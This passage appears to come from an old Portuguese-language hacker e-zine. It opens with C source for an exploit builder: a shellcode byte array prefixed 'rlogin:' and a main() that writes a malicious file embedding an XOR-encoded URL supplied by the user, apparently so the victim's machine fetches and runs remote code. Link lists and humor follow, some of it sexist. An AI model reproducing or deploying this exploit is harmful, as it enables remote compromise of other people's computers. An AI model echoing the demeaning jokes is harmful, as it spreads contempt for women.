unsigned char aSploit[] = {
0x72, 0x6C, 0x6F, 0x67, 0x69, 0x6E, 0x3A, 0x33,
0xDB, 0x3B, 0xDB, 0x74, 0x53, 0xAB, 0x88, 0xB2,
0x97, 0xB1, 0x94, 0xF0, 0x9E, 0xB2, 0x96, 0xDE,
0xAF, 0x8C, 0xB6, 0x9A, 0x95, 0xA9, 0x94, 0xB2,
0x95, 0xBF, 0x9E, 0x8A, 0x95, 0x9D, 0x9B, 0xBD,
0x92, 0xBB, 0xBC, 0xB7, 0x96, 0xBB, 0xBB, 0xDE,
0x9C, 0xAA, 0x8A, 0xE4, 0xC8, 0xEE, 0xC9, 0xF0,
0xC9, 0xEE, 0xD4, 0xEC, 0xCB, 0xEC, 0xD4, 0xEF,
0xCA, 0x82, 0x9B, 0xF0, 0x9F, 0xA6, 0x9F, 0xDE,
0x92, 0xec, 0xc0, 0x9b, 0xb2, 0x66, 0x33, 0x53,
0xb9, 0x61, 0x35, 0xee, 0xd2, 0xae, 0xd4, 0xDE,
0xAD, 0xB7, 0x94, 0x9B, 0x82, 0xBB, 0x99, 0xDE,
0xB3, 0x01, 0xC1, 0xC3, 0x18, 0x8B, 0xD3, 0x8B,
0xF3, 0x66, 0xBA, 0xC0, 0x10, 0x8B, 0x12, 0x66,
0xBB, 0xB8, 0x10, 0x8B, 0x1B, 0x66, 0xBE, 0xC0,
0xC2, 0x8B, 0x36, 0x8B, 0x7C, 0x24, 0x04, 0x33,
0xC9, 0xB1, 0x2F, 0x66, 0x8B, 0x07, 0x66, 0x35,
0xDE, 0xFA, 0x66, 0x89, 0x07, 0x83, 0xC7, 0x02,
0xE0, 0xF1, 0x8B, 0x4C, 0x24, 0x04, 0x83, 0xC1,
0x06, 0x51, 0xFF, 0xD2, 0x8B, 0x4C, 0x24, 0x04,
0x83, 0xC1, 0x11, 0x51, 0x50, 0xFF, 0xD3, 0x8B,
0xD3, 0x8B, 0xD8, 0x8B, 0x4C, 0x24, 0x04, 0x83,
0xC1, 0x51, 0x51, 0x56, 0xFF, 0xD2, 0x8B, 0xF8,
0x8B, 0xEC, 0x81, 0xC4, 0xFF, 0xFB, 0xFF, 0xFF,
0x8B, 0x4D, 0x04, 0x83, 0xC1, 0x29, 0x33, 0xC0,
0x50, 0x50, 0x66, 0xB8, 0xFF, 0x03, 0x50, 0x8B,
0xC5, 0x05, 0xFF, 0xFB, 0xFF, 0xFF, 0x50, 0x51,
0x33, 0xC0, 0x50, 0xFF, 0xD3, 0x8B, 0xDC, 0x33,
0xC0, 0x50, 0x53, 0xFF, 0xD7, 0x33, 0xC0, 0x74,
0xFE, 0x62, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
0x28, 0x01, 0xB9, 0x20, 0x61, 0x88, 0xFD, 0x56,
0x20, 0x0C, 0x02, 0xB9, 0x20, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0xFC, 0x56,
};


int main( int argc, char *argv[] ) {

if( argc == 3 ) {
DWORD dwURLlen = strlen( argv[ 1 ] )+1;
if( dwURLlen < 40 ) {
HANDLE h = CreateFile(
argv[ 2 ],
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
0,
0 );

if ( h == INVALID_HANDLE_VALUE ) {
printf( "Error creating %s\n", argv[ 2 ] );
return( 0 );
}

DWORD dwWrit = 0;
if( !WriteFile( h, aSploit, URL_OFFSET, &dwWrit, NULL ) ||
( dwWrit != URL_OFFSET ) )
goto writeerr;

for( char *p = argv[ 1 ]; ( *p ) && ( *(p+1) ); p+=2 )
*PWORD( p ) ^= 0xdefa; // 0xfade "little-endian"ed - should use
htons?
*PWORD( p ) ^= 0xdefa;

if( !WriteFile( h, argv[ 1 ], dwURLlen, &dwWrit, NULL ) ||
( dwWrit != dwURLlen ) )
goto writeerr;

DWORD dwToWrite = sizeof( aSploit ) - ( URL_OFFSET + dwURLlen );
if( !WriteFile( h, &aSploit[ URL_OFFSET+dwURLlen ], dwToWrite,
&dwWrit, NULL ) || ( dwWrit != dwToWrite ) )
goto writeerr;

CloseHandle( h );

return( 0 );
}
}

Usage();
return( 1 );

writeerr:
printf( "Error writing to %s\n", argv[ 2 ] );
return( 2 );
}

------------------------------------------------------------

P.S. Australian programmer with 19 years experience, C/++,
Asm, Delphi, SQL, IP + more, looking for work overseas.

Jeremy Kothe (jeremy@edi.com.au or paceflow@hotmail.com)

P.P.S. When exposing these type of exploits, it is usual
for the coder to launch into a tirade about Microsoft and
what terrible software it writes to allow these... I feel
that these people are missing the point, though. Microsoft
has risen (very successfully) to the challenge of providing
a couple of GENERAL PURPOSE, incredibly extensive operating
systems for PC's. Anyone who prefers Linux for it's
stability etc. should consider the cost (to the average
end-user) of such stability. Microsoft have concentrated
on the commercial requirements of the corporate Joe, and
have written the software people (not jellyheads) need. Of
course it would be wonderful if Windows was as solid as
secure as a unix installation, but it is simply not the
highest priority for the average PC user.

LINKS e INFO INTERESSANTE:

Páginas com informações sobre falsos vírus ou besteira eletrônica:

http://ciac.llnl.gov/ciac/CIACHoaxes.html
http://www.kumite.com/myths/
http://www.datafellows.com/news/hoax
http://www.symantec.com/avcenter/hoax.html

Checagem contra Trojans.

O Chaosmaker resolveu dar um exemplo de inventividade hacker e fez uma página que permite o sujeito saber se tem algum trojan rodando no seu micro (sem precisar instalar nenhum programa). Veja em

http://safescan.safenetworks.com/cgi-bin/safecgi?lang=pt

Saiu a última versão do BSD http://www.openbsd.org/

Como se livrar do Pretty Park

http://vil.nai.com/vil/vpe10175.asp

Algumas novidades sobre vírus de macro e suas variantes:

http://www.avpve.com/viruses/worms/bad_ass.html

http://vil.nai.com/vil/vm10385.asp
http://vil.nai.com/vil/vm10386.asp
http://www.zdnet.co.uk/news/specials/1999/03/virus/

O menor webserver do mundo: http://www-ccs.cs.umass.edu/%7Eshri/iPic.html

Página sobre o Djgpp na USP:  http://www.ime.usp.br/~jose/djgpp

Meu compilador favorito agora está de volta, numa bagagem GNU:  http://www.brain.uni-freiburg.de/~klaus/fpc/

Um programinha legal para fazer download de páginas http://www.ensicaen.ismra.fr/~roche/httrack.html

Linux Administration Security Guide - Um guia para administrar a segurança do seu site Linux. Não precisa gastar grana com livros que vão ficar obsoletos. Basta acessar http://www.securityportal.com/lasg
Versão em espanhol em: http://segurinet.com/gsal/default.htm

Algumas ferramentas úteis da Adobe, agora disponíveis via email:

Conversor de PDF p html via email Pdf2html@adobe.com
Conversor de PDF p txt via email Pdf2txt@adobe.com
A página onde se pode encontrar isso:http://access.adobe.com/simple_form.html

Acho q peguei essas dicas no Jornal da Tarde.. fotos gratuitas (freeware) para sites na web http://www.freefoto.com Site do 007 http://www.007.com

Outro site razoavel http://www.defenda-se.inf.br/

Um projeto maluco de um leitor que ainda não aprendeu (até ontem) quem meu nome é D-E-R-N-E-V-A-L. Mas vale a pena dar uma olhada http://pontobr.br

Para quem tem alguma curiosidade sobre como terminou o seriado da CAVERNA DO DRAGÃO http://www.mindspring.com/~michaelreaves/D&Dpreface.html http://welcome.to/caverna

Esta aqui é uma pagina muito doida, muito radical, sobre barulho das armas de fogo.. give peace a chance, man
Nemesis

Um bug de Internet Information Server http://www.securityfocus.com/templates/archive.pike?list=1&date=
1999-08-8&msg=37B5D87E.D6600553@urban-a.net

Subprodutoda confereência do CCC, ocorrida na Alemanha em Agosto. Uma conferência sobre como fazer seu caminho em IT (Information Technology) http://www.computerworld.com/home/news.nsf/all/9908124hackcareers

Tem mais história sobre a conferência em http://www.computerworld.com/home/news.nsf/all/9908124hackcareers e no http://www.ccc.de

Um site que promete: http://www.gamesarmy.cjb.net

5 megas de espaco p. salvar seus trabalhos (eu sei q tem sites oferecendo mais) http://www.filemonkey.com/scripts/t3cgi.exe/filemonkey.taf

Um página so' de links sobre discos voadores http://www.eldisco.com/links.cfm

Uma Comic-strip legal http://www.userfriendly.org/index.html

Museu do mousepad http://www.expa.hvu.nl/ajvdhek/

Anatel Agência Nacional de Telecomunicações - ANATEL - Destaques

Um D.O.S (Denial of Service) no http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=549

Um livro de código da 1a Guerra. Interessante, se vc e' interessado em cripto http://www.cix.co.uk/~klockstone/codebook.htm

Alguns links de jogos
Um site que fiz com download de material p. fazer joguinhos
ReBoots - Jogos On-line
http://www.emux.com/ Tudo sobre emuladores
MacGameNews - Jogos de Mac
ReBoots Guide to Internet Gaming
MacGameNews.com - Mac game news, reviews, codes and free games
GameStats News Network - Tips and Tricks
Jane's Combat Simulations - www.janes.ea.com
Jane's Game Demos
Zine Store
Links de vigilãncia e paranóia (Obs: não é paranóia se estão realmente te perseguindo):
http://www.usnews.com/usnews/issue/970623/23onli.htm
http://www.usnews.com/usnews/issue/980511/11mone.htm
http://www.redherring.com/mag/issue70/news-privacy.html
http://newsweek.com/nw-srv/issue/13_99a/printed/us/st/ty0113_1.htm
http://www.nytimes.com/library/cyber/week/061297privacy.html
http://webreview.com/pub/1999/06/18/platform/index.html

http://demographics.com/publications/mt/97_mt/9705_mt/mt97055.htm


HUMOR

Anos 90
Você ja' teve o bastante dos anos 90 se:
1. Você ja' chegou ao ponto de ter que colocar senha para usar o microondas.
2. Ha' anos voce ja' nao usa cartas de verdade para jogar paciencia.
3. Você pergunta aos seus colegas de trabalho na mesa ao lado via e- mail se alguem esta' a fim de tomar um chope e recebe resposta tambem via e-mail que "tudo bem, me da' so' 5 minutinhos".
4. Você dispoe de 15 numeros de telefone diferentes para se comunicar com os tres membros da sua familia.
5. Você conversa pelo chat varias vezes por dia com um sujeito nos Estados Unidos, mas esse ano ainda nao trocou uma palavra com o vizinho do lado.
6. Você compra um computador novo e uma semana depois ele ja' esta' ultrapassado.
7. O motivo de ter perdido o contato com seus amigos e' que eles nao tem e-mail.
8. Você ja' nao sabe mais quanto custa um selo.
9. Para voce, ser organizado significa ter aqueles adesivos de post-it em diversas cores.
10. A maior parte das piadas que voce conhece recebeu pelo e-mail.
11. Você atende dando o nome da firma onde trabalha, se o telefone toca de noite em casa.
12. Você disca primeiro o zero quando quer telefonar de casa.
13. Ja' faz 4 anos que voce esta' na mesma mesa e, ali mesmo, ja' trabalhou para 3 firmas diferentes.
14. O logo da firma onde voce trabalha muda todo ano para se adequar melhor ao seu novo conceito empresarial
15. Você sai pro trabalho quando ainda esta' escuro e quando volta tambem ja' escureceu.
16. Você tem um programa de configuracao que lhe mostra o numero de dias que faltam ate' a sua aposentadoria.
17. Quando alguem pergunta sua profissao, os seus pais dizem que voce "trabalha com computador".
18. Você so' reconhece os seus filhos gracas 'as fotos em cima da mesa no escritorio.
19. Você foi lendo essa lista e concordando com a cabeca...
20. E agora ja' esta' pensando para quem e' que vai mandar tambem.


A mulher na informática

A mulher e a informática surgiram na face da Terra em épocas bem distintas uma da outra.
Mesmo assim, podemos notar que existem muitas semelhanças entre as duas.

Veja a seguir a associação feita entre os tipos de mulheres e o mundo dos computadores:

Mulher Compilada: Aquela que sempre funciona em qualquer lugar com qualquer um.
Mulher Excel: Dizem que faz muitas coisas mas você só a utiliza para as quatro operações.
Mulher Norton Utilites: Serve apenas para melhorar o seu rendimento ou em caso de total emergência.
Mulher USB: Dizem que se conecta com qualquer dispositivo, mas ninguém tem.
Mulher Ergonômica: É aquela que se adapta às suas necessidades.
Mulher Network: É a que difunde os seus atributos a todas amigas.
Mulher Paintbrush: Serve apenas para seus filhos.
Mulher RAM: Aquela que esquece o que faz assim que desliga.
Mulher Disco Rigido: Aquela que se recorda de tudo o tempo todo.
Mulher Windows: Todo mundo sabe que não presta mas ninguen vive sem ela.
Mulher Encarta: Só o Bill Gates tem paciência para agüentar por mais de meia hora.
Mulher Windows 95: Já deu problema para 80% da humanidade e continua dando problema para os outros 20%. Mulher Mutimídia: Faz tudo parecer bonitinho.
Mulher GetRight: Serve para você conseguir outras de forma segura.
Mulher ScreenSaver: Não serve para nada, mas é bonitinha.
Mulher Mouse: Só funciona quando é arrastada e apertada.
Mulher Palmtop: Pequena, mas eficiênte.
Mulher Joystick: Vive deixando você com a mão suada e com cãibra no braço.
Mulher Soundblaster: Só a voz é que presta.
Mulher Univac: Velha, grande, meio lerda e esquenta rápido demais.
Mulher DOS: Todos usaram algum dia mas agora ninguém quer.
Mulher BASIC: Todos usaram algum dia, mas agora ninguém com mais de 12 anos de idade aguenta.
Mulher AMD: Boa, bonita e mais barata.
Mulher Backup: Sempre voçê acha que tem mas na hora do "vamo-vê" não funciona.


PIADAS DE ENGENHEIROS (Se você gostou do "como paquerar um Nerd"..)

Voce e' um engenheiro (ou pelo menos tem vocacao para isso) se voce
responder afirmativamente a aproximadamente 3,287 % das afirmacoes abaixo:

- Vc sabe calculo vetorial, mas nao lembra como fazer uma divisao com
virgula.
- Você tem uma calculadora científica e conhece TODAS as suas funções.
- Vc ja' usou o AutoCAD para projetar uma pipa para o seu filho.
- Vc ja' passou horas realizando o relatorio de um experimento que durou
alguns segundos.
- Vc tem um bichinho de estimacao com o nome de um grande cientista.
- Vc ri de piadas sobre matematicos.
- Vc considera qualquer curso nao-cientifico como "facil" ou "sub-curso".
- Vc nao entende como algumas pessoas podem achar dificil programar um
videocassete.
- Vc assistiu "Apollo 13" e achou que os verdadeiros herois foram os caras
no "Controle da Missao".
- Vc assume que um "cavalo" e' equivalente a uma "ponto no espaco" para
facilitar os calculos.
- Uma crianca de quatro anos lhe pergunta por que o ceu e' azul e vc tenta
explicar toda a teoria da absorcao atmosferica ou do espalhamento
eletro-magnetico que um amigo físico lhe explicou certa
vez.
- Vc vai a uma loja de informatica e os vendedores nao conseguem responder
suas perguntas.
- Vc costuma assobiar a musica tema de "MacGyver".
- O que vc mais gosta no Natal e' montar os brinquedos das criancas.
- Vc ja' tentou consertar alguma coisa usando elasticos, clipes de papel e
fita adesiva.
- Seu PC vale mais do que um carro.
- Vc pode lembrar de 7 senhas de computador, mas nao da data do aniversario
da sua mae.
- Vc sabe qual sera' o sentido de rotacao da agua quando puxar a descarga.
- Vc esta' sendo processado pela Sociedade Protetora dos Animais por
realmente ter realizado o experimento do Gato de Schrodinger.
- Vc SABE o que e' o experimento do Gato de Schrodinger.
- Vc consegue digitar 70 palavras por minuto, mas nao entende sua propria
caligrafia.
- Vc ja' abriu alguma coisa "so' para ver como e' por dentro".
- Vc guarda pecas de eletrodomesticos estragados.
- Vc assiste filmes de ficcao cientifica e fica procurando cenas ou
argumentos que estao cientificamente incorretos.
- Vc tem o habito de estragar coisas tentando descobrir como elas funcionam.
- A maior parte das piadas que vc recebe vem por e-mail.

(Peguei na lista piadas-l@listas.ansp.br - Silvia R.G.)

Installing Love


Can You Install Love?

Customer Service Rep: Can you install LOVE?

Customer: I can do that. I'm not very technical, but I think I am ready to
install now. What do I do first?

CS Rep: The first step is to open your HEART. Have you located your HEART ma'am?

Customer: Yes I have, but there are several programs running right now. Is it
okay to install while they are running?

CS Rep: What programs are running ma'am?

Customer: Let me see....I have PASTHURT.EXE, LOWESTEEM.EXE, GRUDGE.EXE, and
RESENTMENT.COM running right now.

CS Rep: No problem. LOVE will automatically erase PASTHURT.EXE from your current
operating system. It may remain in your permanent memory, but it will no longer
disrupt other programs. LOVE will eventually overwrite LOWESTEEM.EXE with a
module of its own called HIGHESTEEM.EXE. However, you have to completely turn
off GRUDGE.EXE and RESENTMENT.COM. Those programs prevent LOVE from being
properly installed. Can you turn those off ma'am?

Customer: I don't know how to turn them off. Can you tell me how?

CS Rep: My pleasure. Go to your Start menu and invoke FORGIVENESS.EXE. Do this
as many times as necessary until GRUDGE.EXE and RESENTMENT.COM have been
completely erased.

Customer: Okay, I'm done. LOVE has started installing itself automatically. Is
that normal?

CS Rep: Yes it is. You should receive a message that says it will reinstall for
the life of your HEART. Do you see that message?

Customer: Yes I do. Is it completely installed?

CS Rep: Yes, but remember that you have only the base program. You need to begin
connecting to other HEARTS in order to get the upgrades.

Customer: Oops...I have an error message already. What should I do?

CS Rep: What does the message say?

Customer: It says "ERROR 412 - PROGRAM NOT RUN ON INTERNAL COMPONENTS." What
does that mean?

CS Rep: Don't worry ma'am, that's a common problem. It means that the LOVE
program is set up to run on external HEARTS but has not yet been run on your
HEART. It is one of those complicated programming things, but in non-technical
terms it means you have to "LOVE" your own machine before it can "LOVE" others.

Customer: So what should I do?

CS Rep: Can you find the directory called "SELF-ACCEPTANCE"?

Customer: Yes, I have it.

CS Rep: Excellent, you are getting good at this.

Customer: Thank you.

CS Rep: You're welcome. Click on the following files and then copy them to the
"MYHEART" directory: FORGIVESELF.DOC SELFESTEEM.TXT, REALIZEWORTH.TXT, and
GOODNESS.DOC. The system will overwrite any conflicting files and begin patching
any faulty programming. Also, you need to delete SELFCRITIC.EXE from all
directories, and then empty your recycle bin afterwards to make sure it is
completely gone and never comes back.

Customer: Got it. Hey! My HEART is filling up with really neat files. SMILE.MPG
is playing on my monitor right now and it shows that WARMTH.COM, PEACE.EXE, and
CONTENTMENT.COM are copying themselves all over my HEART!

CS Rep: Then LOVE is installed and running. You should be able to handle it from
here. One more thing before I go...

Customer: Yes?

CS Rep: LOVE is freeware. Be sure to give it and its various modules to
everybody you meet. They will in turn share it with other people and they will
return some really neat modules back to
you.

Customer: I will. Thank you for your help.

--------------------------------------------------
     COMPREENDENDO OS ENGENHEIROS

 Compreendendo os Engenheiros ( 1 )

 Dois estudantes de engenharia estavam caminhando pelo campus quando
 um  deles disse:

        -Onde você conseguiu essa magnífica bicicleta ?

 O segundo respondeu:

        -Bem, eu estava caminhando por aí ontem, pensando em meus
trabalhos, quando apareceu uma formosa mulher com esta bicicleta.
Atirou a bicicleta  ao solo,tirou toda a sua roupa e disse:  "Pega o
que quiser".

  O primeiro engenheiro acenou afirmativamente:

        -Boa escolha! A roupa provavelmente não teria servido para você!".


 * * *

 Compreendendo os Engenheiros ( 2 )

 Um arquiteto, um artista e um engenheiro estavam discutindo se era
 melhor  passar o tempo com a mulher ou com a amante. O arquiteto
 disse que gostava  de passar o tempo com sua mulher, construindo uma
 base sólida para uma relação duradoura. O artista disse que gostava
 de passar o tempo com sua  amante, porque com ela encontrava paixão
 e mistério.
 O engenheiro disse:
        - Eu gosto das duas
        -As duas?!
        -Sim. Se tens uma mulher e uma amante, cada uma delas acha que
você está  passando o tempo com a outra, e você poder ir para a
empresa terminar o  trabalho!

 * * *

 Compreendendo os Engenheiros ( 3 )

 Qual a diferença entre os engenheiros e os arquitetos?
 Os engenheiros constroem armas, os arquitetos construem alvos.

 * * *

 Compreendendo os Engenheiros ( 4 )

 Para o otimista, o copo está meio cheio.
 Para o pessimista, o copo está meio vazio.
 Para o engenheiro, o copo está duas vezes maior do que deveria ser.


 * * *

 Compreendendo os Engenheiros (5)

 Um engenheiro estava atravessando uma estrada um dia, quando um sapo
 o  chamou e lhe disse:

        -Se me beijar, me transformarei em uma formosa princesa.

  O engenheiro se inclinou, pegou o sapo e o pôs no bolso.  O sapo
voltou a falar, e disse:

        -Se me beijar para que me transforme em uma formosa princesa,
ficarei com  você durante uma semana.

  O engenheiro tirou o sapo do bolso, sorriu para ele e voltou a
pô-lo no  bolso.  Então o sapo gritou:

        -Se me beijar eu me transformarei em uma formosa princesa, ficarei
com  você e farei tudo o que quiser.

 Outra vez o engenheiro pegou o sapo, sorriu para ele e o pôs de novo
no  bolso.  Finalmente o sapo perguntou:

        -O que é que está acontecendo? Eu disse que sou uma formosa
princesa, que  ficarei com você por uma semana e farei tudo o que
quiser. Por que você não me beija?

  O engenheiro disse:

        -Veja, eu sou um engenheiro. Não tenho tempo para namoradas, mas um
sapo  que fala, isso sim é interessante !!

--------------------------------------------------
Namoro na Net

Certa jovem universitária que prefere manter-se incógnita, a quem
chamaremos de Jill, estava cursando a faculdade de ciência da computação
numa universidade nos EUA. Para quem conhece a vida universitária
americana, o dia-a- dia de um estudante consiste de um pouco de estudo e
de *muita* festança e gandaia.

O caso de Jill não era diferente, sempre correndo atrás de suas
obrigações acadêmicas, mas com as antenas ligadonas na vida selvagem que
curtia com os amigos. Mas não se podia falar mal de Jill, que também era
fera em computação.

Não era sem esforço que conseguia brilhar nos estudos. Quando não estava
se divertindo, enfiava a cara pra valer nos trabalhos e ralava pesado
projetando programas, escrevendo código e instalando software. Certa
feita, poucos dias depois de ter rompido com um namorado, estava a nossa
Jill em casa numa sexta à noite. Era a primeira vez em três anos que se
via livre nesse dia sagrado da semana, pois normalmente estaria com o
namorado.

Era normal que se sentisse no maior baixo-astral. Para encher o tempo e
afastar o fantasma da saudade, decidiu fazer uma nova home page. Lá
pelas tantas, depois de algumas horas de links e tabelas, cansou-se
daquilo e entrou numa sala de chat para relaxar um pouco.

Sendo uma menina fogosa e ainda curtindo a dor de cotovelo, optou por um
chat de sexo e começou a brincar com quem estava on-line. Foi quando
tudo começou. Jill conheceu um camarada no chat chamado Mike. Claro que
não era o nome verdadeiro dele. Obviamente ela também não disse seu nome
real: optou por se chamar "Nancy".

Começaram os dois a brincar com aquele jogo excitante da fantasia,
entrando em minuciosos detalhes sobre o que fariam se estivessem juntos
em algum lugar sossegado, à meia luz. É desnecessário dizer o quão alto
podem voar duas pessoas envolvidas em chats desse tipo. É o que se
chama de ciber-sexo e, se os parceiros virtuais forem hábeis no manejo
do teclado e conseguirem se soltar razoavelmente na linguagem escrita,
o resultado pode ser incrivelmente prazeiroso.

A coisa pegou fogo e alguns minutos mais tarde estavam se despedindo,
concordando em se encontrarem no dia seguinte. Chegou a noite de sábado
e lá estavam eles, provocando-se novamente.

Aproximaram-se ainda mais nessa segunda tentativa e os encontros
virtuais foram se repetindo. Acabaram papeando on-line a semana toda,
sempre terminando a conversa com erupções vulcânicas, terremotos e
tornados. Na outra segunda-feira, o colóquio se desviou para assuntos
mais íntimos, desta vez aproximando-os como pessoas, fazendo com que
compartilhassem questões particulares e sentimentos.

Os dois sentiam suas almas cada vez mais próximas, suas vidas se
entrelaçando e a relação se tornando mais intensa e complexa. Jill não
queria revelar que era uma universitária em início de curso, pois
temia que Mike a achasse imatura. Sentiu-se meio culpada, mas superou
essa fase, passando a gostar cada vez mais do Mike que parecia um cara
fascinante, vivido e agradável. Os e-mails que trocavam eram apaixonados
e inflamáveis.

A troca de energias prolongou-se por meses, até que comemoraram um ano
desde o primeiro chat. Já haviam contado seus pensamentos mais secretos
e, mesmo assim, nunca trocaram fotos nem tiveram coragem de falar ao
telefone.

Morriam de medo de destruir o clima de mistério. Haviam feito tudo que
era sexualmente possível via Internet, mas não sem um profundo afeto.
Era natural que passassem a ansiar por um encontro físico, real.
Num belo dia, os dois decidiram que era hora de se conhecerem. Estavam
se amando e não se importavam com idade, aparência física, coisa
nenhuma.

Queriam apenas um ao outro, loucamente. Mike disse a Jill que ela
poderia até ser sua próxima esposa. Ela ficou meio assustada a
princípio. E se ele fosse velho? E se fosse feio? Ora, que se dane.
Ela o amava e isso bastava. Era o único cara com quem se sentia
confortável.

Planejaram então uma viagem para uma cidade do interior, onde passariam
um fim-de-semana juntos. Ia ser o máximo! Imagine a leitora o friozinho
na barriga que os dois sentiam só em pensar no encontro. Jill não queria
o trabalho de ter que reconhecer o Mike, portanto pediu a ele que
agitasse um aposento num hotel e eles se encontrariam direto no quarto.
Mike topou no ato.

No dia aprazado, a nervosa Jill chegou, apresentou-se como Nancy à
recepcionista e foi se instalar no quarto reservado pelo Mike, que
chegaria em alguns minutos.

Entrou no quarto, inspecionou as instalações e pôs-se a preparar um
ambiente romântico e especial para a ocasião. Acendeu velas perfumadas,
ligou um som gostoso, tirou a roupa e deitou na cama, para fazer uma
surpresa para o amado. Quando ele chegou, meteu a chave na porta com
cuidado e chamou sussurrando: "Nancy!".

Ela, emocionada, respondeu, quase sem ar:
"Mike, estou aqui". Ele apalpou a parede junto à porta em busca do
interruptor, acendeu a luz e viu Jill nua sobre a cama. O que se ouviu
depois naquele hotel foram dois gritos lancinantes, um grosso e outro
esganiçado. Jill cobriu-se imediatamente e, com sua voz mais humilhada,
disse ofegante e pasma:

"Papaai!"

(Luis C)
---------------------------------------------

>> Um analista de sistemas meio introvertido finalmente conseguiu realizar
o
>> sonho da sua vida: um cruzeiro. Estava começando a desfrutar da viagem
>> quando um furacão virou o navio como se fosse uma caixa de fósforos. O
>> rapaz conseguiu agarrar-se a um salva-vidas e chegar a uma ilha
>> aparentemente deserta e muito escondida. Deparou com uma cena belíssima:
>> cachoeira, bananas, coqueiros... mas quase nada além disso. Ele se
sentiu
>> desesperado e completamente abandonado.
>> Vários meses se passaram e um belo dia apareceu, remando, uma belíssima
>> moça, mistura de Sharon Stone com Cindy Crawford. A moça começou uma
>> conversa:
>> * Eu sou do outro lado da ilha. Você também estava no cruzeiro?
>> * Estava! Mas onde conseguiu esse bote?
>> * Simples! Tirei alguns galhos de árvores, sangrei alguma borracha,
>> reforcei os galhos, fiz a quilha e os remos com madeira de eucalipto.
>> * Mas... com que ferramentas?
>> * Bom, achei uma camada de material rochoso, evidentemente formada por
>> aluviões. Eu descobri que esquentando este material a uma certa
>> temperatura, ele assumia uma forma muito maleável.
>> Mas chega disso! Onde você tem vivido esse tempo todo? Não vejo nada
>> parecido com um teto...
>> * Para ser franco, eu tenho dormido na praia...
>> * Quer vir a minha casa?
>> * O analista de sistemas aceitou, meio sem jeito. A moça remou com
extrema
>> destreza ao redor da ilha. Quando chegou no "seu" lado, amarrou a canoa
>com
>> uma corda que mais parecia uma obra prima de artesanato. Os dois
>caminharam por uma passarela de pedras construída pela moça e depararam,
>atrás de um coqueiro, com um lindo chalé pintado de azul e branco.
>> * Não é muito, disse ela, mas eu o chamo de "lar".
>> Já dentro, ela convidou:
>> * Sente-se, por favor! Aceita um drinque?
>> * Não, obrigado! Não aguento mais água de coco!
>> * Mas não é água de coco! Eu tenho um alambique meio rudimentar lá fora,
>de
>> forma que podemos tomar Pinas-coladas autênticas!
>> Tentando esconder a surpresa, o analista aceitou. Sentaram no sofá dela
>> para conversar. Depois de contarem suas histórias, a moça perguntou:
>> * Você sempre teve barba?
>> * Não. Toda a vida eu andei bem barbeado.
>> * Bom, se quer se barbear, tem uma navalha lá em cima, no armarinho do
>> banheiro.
>> O homem achou que a moça estava de sacanagem, mas foi assim mesmo. Lá em
>cima, surpreso, fez a barba com um complicado aparelho feito de osso e
>> conchas, tão afiado quanto uma navalha.
>> A seguir, tomou um bom banho, sem nem querer arriscar palpites sobre
como
>> ela tinha água quente no banheiro. Desceu sem poder deixar de se
>maravilhar
>> com o acabamento do corrimão.
>> * Você ficou ótimo! Vou lá em cima também me trocar por algo mais
>> confortável.
>> Nosso herói continuou bebericando sua pina colada. Em instantes, a moça
>> estava de volta, com um delicioso perfume de gardênias, e vestindo um
>> estonteante e revelador robe, muito bem trabalhado em folhas de
palmeira.
>> * Bom - disse ela - ambos temos passado um longo tempo sem qualquer
>> companhia... Você não tem se sentido solitário? Ha alguma coisa de que
>você
>> sente muita saudade? Que lhe faz muita falta e do qual todos os homens
e>
>> mulheres precisam?
>> * Mas é claro! - disse ele esquecendo um pouco sua timidez. Tem algo que
>> venho querendo todo esse tempo. Mas... aqui nesta ilha... sabe como é...
>> era simplesmente impossível.
>> * Bom - disse ela - já não é mais impossível, se é que você me
entende...
>> O rapaz, tomado de uma excitação incontrolável, disse, quase sem alento:
>> * Não acredito! Você não está querendo dizer que... você bolou um jeito
de
>> pegar os seus e-mails aqui, na ilha?
>>
------------------------------------------
VOCÊ É UM CONSULTOR OU UMA PROSTITUTA?

 1. Você trabalha em horários malucos
 2. Você recebe uma nota preta para deixar o cliente feliz
 3. Você recebe uma boa grana mas é o cafetão que fica com a maior parte
 4. Você passa a maior parte de seu tempo de trabalho num quarto de hotel
 5. Você cobra por hora mas pode extender o tempo
 6. Você não se orgulha do que faz
